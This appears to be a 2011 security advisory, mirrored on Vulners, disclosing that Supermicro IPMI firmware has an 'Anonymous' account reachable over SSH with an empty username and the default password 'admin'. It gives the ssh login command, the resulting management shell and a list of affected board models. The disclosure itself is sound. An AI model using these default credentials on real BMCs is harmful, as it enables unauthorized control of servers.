Lucene search
K

Supermicro IPMI Default Accounts

🗓️ 13 Oct 2011 00:00:00Reported by Floris BosType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 51 Views

Supermicro IPMI Default Accounts can be exploited due to default "ADMIN" and "Anonymous" accounts. "ADMIN" password should be changed as per official documentation, but "Anonymous" password is often neglected. However, "Anonymous" account can be accessed via SSH using empty username and default password "admin

Code
`The IPMI functionality of some Supermicro mainboards comes with two admin  
accounts by default, which are labeled in the webinterface:  
  
"ADMIN"  
"Anonymous"  
  
The official documentation only tells you to change the password of the  
"ADMIN" account:  
  
==  
Note: The manufacturer default username and password are ADMIN/ADMIN.   
Once you have logged into the BMC using the manufacturer default password,  
  
be sure to change your password for security purpose.   
==  
  
Because of this, and because it does not seem to possible to login with  
"Anonymous" in the webinterface, many admins do not bother to change the  
password of "Anonymous".  
However you can login to this account through SSH by specifying an empty  
username (default password "admin" in lowercase).  
  
==  
$ ssh -l "" -o PreferredAuthentications=password,keyboard-interactive  
xx.xx.xx.xx   
@xx.xx.xx.xx's password:   
Auth User/Pass with PS...pass.  
  
ATEN SMASH-CLP System Management Shell, version 1.00  
Copyright (c) 2008-2009 by ATEN International CO., Ltd.  
All Rights Reserved  
  
  
->  
==  
  
  
Tested on a X9SCL-F.  
The following model numbers seem to use the same firmware:  
  
==  
# cd /etc/conf ; ls *.xml  
platform.xml platform_H8DGU.xml   
platform_X7Sb3.xml platform_X8DTUplus.xml   
platform_X8STI_3F.xml  
platform_H8DCL.xml platform_H8DGU_LN4.xml   
platform_X8DTL_6F.xml platform_X8DTW_6F.xml   
platform_X9SCA.xml  
platform_H8DCT.xml platform_H8DGU_LN4_AI034.xml   
platform_X8DTL_iF.xml platform_X8SIA.xml   
platform_X9SCL.xml  
platform_H8DCT_IBQF.xml platform_H8QG6.xml   
platform_X8DTN.xml platform_X8SII.xml   
platform_X9SCM.xml  
platform_H8DG6.xml platform_H8QGI_AI034.xml   
platform_X8DTNplus.xml platform_X8SIL.xml   
platform_X9SRA.xml  
platform_H8DGG.xml platform_H8SCM.xml   
platform_X8DTT.xml platform_X8SIL_SIOM.xml   
platform_X9SRI.xml  
platform_H8DGT.xml platform_H8SGL.xml   
platform_X8DTU-F.xml platform_X8SIT.xml  
platform_H8DGT_HF_AI034.xml platform_X7SPA.xml   
platform_X8DTU.xml platform_X8SIU.xml  
platform_H8DGT_HIBQF_AI034.xml platform_X7SPT.xml   
platform_X8DTU_6TF.xml platform_X8STE.xml  
==  
  
  
Yours sincerly,  
  
Floris Bos  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation